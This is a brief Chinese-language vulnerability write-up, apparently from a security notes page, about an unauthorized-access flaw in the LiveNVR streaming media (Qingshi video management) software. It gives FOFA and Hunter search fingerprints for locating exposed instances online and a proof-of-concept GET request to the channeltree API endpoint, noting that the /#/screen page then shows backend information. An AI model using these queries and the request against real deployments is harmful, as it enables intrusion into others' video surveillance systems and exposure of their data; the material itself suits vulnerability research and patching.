跳到主要内容

LiveNVR流媒体服务软件接口存在未授权访问漏洞

livenvr 青柿视频管理系统 channeltree 存在未授权访问漏洞。

fofa

icon_hash="-206100324" 

hunter

web.icon=="7bfff01de80c14288ff385cd7db83c56"

poc

GET /api/v1/device/channeltree?serial=&pcode HTTP/1.1
Host:

image-20240719130739033

接口访问/#/screen 可以看到后台信息了

image-20240719130703174

漏洞来源